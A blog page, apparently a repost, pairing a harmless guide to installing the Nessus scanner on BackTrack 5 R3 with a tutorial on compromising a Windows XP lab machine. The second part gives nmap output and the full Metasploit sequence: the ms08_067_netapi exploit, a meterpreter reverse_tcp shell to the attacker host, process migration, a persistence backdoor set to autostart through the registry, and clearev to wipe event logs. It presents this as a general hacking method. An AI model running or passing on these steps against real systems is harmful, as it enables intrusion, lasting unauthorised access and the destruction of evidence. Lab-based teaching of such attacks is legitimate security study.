Ci t phn mm Nessus trn backtrack

Mar 19

How to Install Nessus on Backtrack 5 R3

Nessus is a network vulnerability scanning program. It is free for personal use. Its can detect vulnerabilities on the systems. Nessus is the most popular vulnerability scanner in the computer security. Nessus allows scans for vulnerabilities, misconfiguration, default passwords / common passwords / blank passwords on some system accounts, etc. You can use Nessus to scan your system and patch the vulnerability. If you want install Nessus on Backtrack 5 R3 first thing to do is download it from http://www.tenable.com/products/nessus/

Download the Nessus package from http://www.tenable.com/products/nessus/ and install it manually. Read my post before about How to Install Package on Backtrack 5 after you install it, skip to step two. If you have internet connection you can install Nessus from repository. Run this command to download and install Nessus.

apt-get install nessus

After install it, create an account with adduser command like this

/opt/nessus/sbin/nessus-adduser
Now register to Nessus website http://www.nessus.org/register/ to get your activation code that send to your email. After you get the key, run this command, fill change xxxx-xxxx-xxxx-xxxx-xxxx with your key

/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx

It will take some time because plugin is being updated. After the update complete, run your Nessus

/etc/init.d/nessusd start
Then open your browser and type this in the URL of the browser

https://localhost:8834/
Nessus will run on the secure channel https and on the port number 8834. Now try and use Nessus for your own risk :-D

Exploit Windows XP SP3 Using Metasploit (msfconsole) Holla Guys, Lets do some exploitation. :D 1. Startup your XP in Virtualbox (for those who haven't installed xp in virtualbox can see the tutorial here 2. Make sure that the host(BT 5r1) and the XP are connected each other. 3. Lets scan the target to see the services running # nmap -A 192.168.56.101 Spoiler: Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-01-28 05:25 WIT Nmap scan report for 192.168.56.101 Host is up (0.00043s latency). Not shown: 997 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds MAC Address: 08:00:27:91:01:D1 (Cadmus Computer Systems) Device type: general purpose Running: Microsoft Windows XP|2003 OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003 VERSION Microsoft Windows RPC

Network Distance: 1 hop Service Info: OS: Windows Host script results: |_nbstat: NetBIOS name: YUDHI-HOME, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:91:01:d1 (Cadmus Computer Systems) |_smbv2-enabled: Server doesn't support SMBv2 protocol | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | Name: WORKGROUP\YUDHI-HOME |_ System time: 2012-01-28 05:25:50 UTC+7 TRACEROUTE HOP RTT ADDRESS 1 0.43 ms 192.168.56.101 OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.64 seconds

4. Lets scan some vulnerabilities using Nessus. (for how to use nessus you can go here) After the scan finished, lets analyze the report. Great, it says that our target smb service is vulnerable and its vulnerability level is high too. pay attention to this because we have to use it to search for the right exploit. or simply look at there. That plugin name is the hint to search for the right exploit. 4. Lets search the exploit to attack that vulnerability on metasploit. Start your metasploit console.

# msfconsole To search for exploit type meterpreter > search platform:windows type:exploit cve:-2008-4834 app:server path:exploit/windows/smb explanation : for the search sytax type "search -h" platform : because the target is a windows system we choose this. type : because we only want to search an exploit, we choose exploit for this. cve : fill with the data from nessus scan. app : server attack side. path : because we want to search only exploits for smb set the path to this is right. Hit, enter. Notice that there is this exploit there, "ms08_067_netapi" that located at exploit/windows/smb/ms08_067_netapi. The one that have the same name as the plugin name that we've discovered with the nessus earlier. Important to know that almost all windows is vulnurable with this exploit. Lets use it. 5. Type these : use exploit/windows/smb/ms08_067_netapi explanation : by typing this we set the metasploit to use this exploit on the target. set RHOST 192.168.56.101 explanation : RHOST is the target, set the ip with the target that you want to attack. set PAYLOAD windows/meterpreter/reverse_tcp

explanation : meterpreter is the payload that we want to use. I'll explain more about payload later. set LHOST 192.168.56.1 explanation : LHOST is the Listener HOST. this is us. set with our IP. exploit launch the attack. 6.If everything is done correctly, a meterpreter shell will appear on the target system. 7. From this point, the server is under our control. But to prevent the user kill our meterpreter process we must quickly migrate to the other services running. To show the running process on the target system type meterpreter > ps search for explorer.exe process since it is the most important services on windows and identify the process number. Lets migrate to that service. meterpreter > migrate [PID] You can do whatever you want on the system now. 8. Ok, next step is placing a backdoor for later connection. Good for us metasploit also provided the script for it called "persistence". Lets see the usage of this script. meterpreter > run persistence -h

Lets execute it. meterpreter > run persistence -A -X -p 10000 -r 192.168.56.1 And thats it. A backdoor have been created on the target system. (the backdoor will be located at C:\WINDOWS\TEMP directory. It is a .vbs file. The scirpt will also create an autostart in the registry key HKLM\Software\Microsoft\CurrentVersion\Run\XXXXX(random). So, when the pc start, the backdoor will also active. For tutorial to use the backdoor you can go here) 9. And don't forget to clear our hacking tracks. meterpreter > clearev To exit the shell just type "exit". The elaboration from this attack based on the hacking methodology is 1. Information Gathering Using nmap get the information. 2. Service Enumeration Using nmap to see the services running. 3. Vulnerability Assessment Using nessus to scan the vulnerability and metasploit to search the exploit. 4. Exploit Using metasploit on console mode to take over the system. 5. Backdooring Using metaspoit 'persistance' script to create backdoor. 6. Housekeeping Using metasploit 'crearev' to clear the tracks. Hope this helps. :) Lets make the History!!

Read more: http://scx010c075.blogspot.com/2012/01/exploit-windows-xp-sp3using-metasploit.html#ixzz2wbooxOrw